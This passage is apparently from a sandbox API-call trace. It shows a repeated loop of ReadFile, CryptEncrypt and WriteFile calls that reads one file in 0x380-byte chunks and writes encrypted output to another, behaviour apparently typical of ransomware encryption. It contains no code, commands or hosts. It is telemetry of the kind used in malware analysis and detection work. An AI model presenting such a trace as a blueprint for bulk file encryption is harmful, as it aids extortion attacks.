lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.461] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.461] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.461] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.461] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.462] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.462] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.462] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.462] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.462] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.462] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.462] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.462] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.462] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.462] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.462] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.463] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.463] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.463] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.463] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.463] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.463] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.463] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.463] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.463] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.463] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.464] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.464] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.464] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.464] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.464] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.464] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.464] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.464] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.464] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.464] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.464] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.465] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.465] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.465] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.465] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.465] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.465] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.465] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.465] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.465] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.465] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.465] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.466] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.466] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.466] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.466] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.466] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.466] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.466] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.466] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.466] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.466] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.467] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.467] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.467] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.467] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.467] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.467] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.467] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.467] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.467] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.467] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.467] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.468] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.468] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.468] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.468] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.468] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.468] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.468] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.468] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.468] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.468] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.468] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.469] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.469] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.469] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.469] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.469] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.469] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.469] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.469] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.469] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.469] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.470] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.470] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.470] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.470] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.470] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.470] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.470] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.470] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.470] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.470] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.470] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.470] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.471] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.471] CryptEncrypt (in: hKey=0x2fa988, 